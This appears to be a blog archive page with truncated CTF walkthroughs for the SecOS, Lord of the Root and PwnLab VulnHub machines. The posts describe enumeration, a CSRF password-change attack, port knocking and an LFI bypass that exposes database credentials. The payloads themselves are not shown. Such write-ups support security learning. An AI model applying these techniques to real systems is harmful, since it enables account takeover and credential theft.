Showing posts from January, 2017

SecOS: 1 Walkthrough

Hi guys i found another awesome CTF on vulnhub so let's walkthrough the Secos
Nmap :
Result of nmap shows two ports are open. Let's try to access port 8081.

Looks cool ! let's explore website but before open burpsuite and spider this host so that burp can capture some directories. 

So burp caught a page called hint. Let's visit this page.
As always it shows nothing at the front so let's check source code 

We got three hints, after looking at third hint i quickly goto signup option and created a account and logged in with the same account. Digging around i noticed three important points .
Administrator: Spiderman Change password option: Message option: Now we can understand hints simply saying that : We have you conduct a CSRF attack against the administrator i.e spiderman
Let's create a form for CSRF attack and the form should auto-submit so as soon as spiderman visits the page his password will be changed.

Save this form to /var/www directory and start apache server. w…

Lord of the root CTF walkthrough

Hi Guys, today we will walkthrough the Lord of the root CTF challenge. You can find this interesting challenge Here. As stated by the author our goal is to root the box and find out the flag.txt file so let's start ;)
As always our first task is to do strong enumeration so let's start with nmap to check for different services and ports running on target machine.

Nmap shows only port 22 is open let's access it and see if we get any hint to move further.

Basically it gives us the hint for port knocking on port 1,2,3. There are many ways for port knocking but we will use following simple shell script.

Let's run this script for our target IP and ports.

After that let's again run nmap and check for open ports.

As a result of port knocking we got another open port i.e port 1337. Sounds good ? let's access it.

So now let's run nikto to get some juicy information about the target.

But unfortunately nikto shows nothing important. Next i checked the source code for further hi…

Crowdin IDOR Vulnerability


PwnLab CTF Walkthrough

Hi folks, today we will walkthrough the PwnLab CTF penetration testing challenge. You can find this interesting vm Here. As stated by the author our goal is to root the box and find out the flag.txt file so let's start ;)

As an enumeration part i fired up nmap to find out different services running on target machine.

I noticed that ports 80(for http) and 3306(for Mysql) open, next i deiced to run nikto to get some juicy information.

nikto give me hint that config.php file contains username and password, so now i need to find out a way to read config.php. I quickly goto in order to access web and find out possibility of LFI.

next i tried with to inject simple LFI payload but nothing happened.

so i decided to find out some ways to bypass LFI protection and got my friend Aaditya's blog with a nice write-up after that i injected the following payload and got data from config.php

next i decoded this data with base64 encoding and got the database credentials as shown below